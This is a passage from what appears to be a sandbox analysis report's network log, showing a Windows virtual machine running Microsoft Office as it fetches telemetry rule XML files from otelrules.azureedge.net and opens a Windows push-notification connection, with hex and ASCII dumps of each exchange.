                                                                                                                            2024-10-06 11:50:26 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:27 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:26 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 405
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                            ETag: "0x8DC582B942B6AFF"
                                                                                                                            x-ms-request-id: dfb96d6a-f01e-003f-17e5-16d19d000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115026Z-1657d5bbd48dfrdj7px744zp8s00000001p000000000a67s
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:27 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            124192.168.2.64986713.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:26 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:27 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:26 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                            ETag: "0x8DC582BBA642BF4"
                                                                                                                            x-ms-request-id: f5ee0945-901e-0083-4202-17bb55000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115026Z-1657d5bbd48dfrdj7px744zp8s00000001pg000000009env
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:27 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            125192.168.2.64986340.113.110.67443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:26 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 47 50 56 39 52 4b 30 61 74 55 32 6c 57 46 43 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 30 37 63 63 38 61 63 38 32 32 34 31 36 66 33 0d 0a 0d 0a
                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: GPV9RK0atU2lWFC3.1Context: b07cc8ac822416f3
                                                                                                                            2024-10-06 11:50:26 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                            2024-10-06 11:50:26 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 47 50 56 39 52 4b 30 61 74 55 32 6c 57 46 43 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 30 37 63 63 38 61 63 38 32 32 34 31 36 66 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 6e 6d 72 33 6f 67 68 45 39 4c 59 70 46 4f 50 43 45 70 44 30 37 6f 43 4e 4b 35 55 35 31 50 53 57 58 5a 6a 76 38 53 66 74 57 65 42 65 42 74 6a 64 36 65 6e 32 32 77 50 53 67 4e 36 79 72 51 32 46 69 45 67 53 66 66 61 6a 42 7a 49 5a 79 4e 6d 36 59 48 69 63 61 65 63 4b 37 39 48 33 66 2f 71 50 45 79 32 77 6c 70 75 72 4b 6c 33 66
                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: GPV9RK0atU2lWFC3.2Context: b07cc8ac822416f3<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYnmr3oghE9LYpFOPCEpD07oCNK5U51PSWXZjv8SftWeBeBtjd6en22wPSgN6yrQ2FiEgSffajBzIZyNm6YHicaecK79H3f/qPEy2wlpurKl3f
                                                                                                                            2024-10-06 11:50:26 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 47 50 56 39 52 4b 30 61 74 55 32 6c 57 46 43 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 30 37 63 63 38 61 63 38 32 32 34 31 36 66 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: GPV9RK0atU2lWFC3.3Context: b07cc8ac822416f3<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                            2024-10-06 11:50:27 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                            2024-10-06 11:50:27 UTC58INData Raw: 4d 53 2d 43 56 3a 20 64 66 4d 37 37 50 56 33 31 45 71 4b 58 50 67 2b 65 45 78 48 33 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                            Data Ascii: MS-CV: dfM77PV31EqKXPg+eExH3A.0Payload parsing failed.


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            126192.168.2.64987013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:27 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:27 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:27 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 958
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                                                                            x-ms-request-id: 0c165d1d-a01e-000d-7dfe-16d1ea000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115027Z-1657d5bbd48xdq5dkwwugdpzr0000000029g000000005v08
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:27 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            127192.168.2.64986913.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:27 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:27 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:27 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1952
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                            ETag: "0x8DC582B956B0F3D"
                                                                                                                            x-ms-request-id: a5ff6bd9-301e-005d-3af2-16e448000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115027Z-1657d5bbd48gqrfwecymhhbfm800000000t0000000007e9q
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:27 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            128192.168.2.64987213.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:27 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:27 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:27 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 2592
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                            x-ms-request-id: 33b4d0ae-a01e-0032-35ff-161949000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115027Z-1657d5bbd48xdq5dkwwugdpzr000000002a0000000004dhg
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:27 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            129192.168.2.64987113.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:27 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:27 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:27 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 501
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                            ETag: "0x8DC582BACFDAACD"
                                                                                                                            x-ms-request-id: c2f609cb-201e-0003-75fd-16f85a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115027Z-1657d5bbd48lknvp09v995n79000000001e000000000gqfq
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:27 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            130192.168.2.64987313.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:27 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:27 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:27 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 3342
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                            x-ms-request-id: 960edd56-701e-005c-4100-17bb94000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115027Z-1657d5bbd48t66tjar5xuq22r800000001ug00000000emux
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:27 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            131192.168.2.64987513.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:28 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:28 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:28 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1393
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                            x-ms-request-id: 8a5fd43d-c01e-0066-4506-17a1ec000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115028Z-1657d5bbd48jwrqbupe3ktsx9w000000026g0000000048ad
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:28 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            132192.168.2.64987413.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:28 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:28 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:28 GMT
                                                                                                                            Content-Type: text/xml
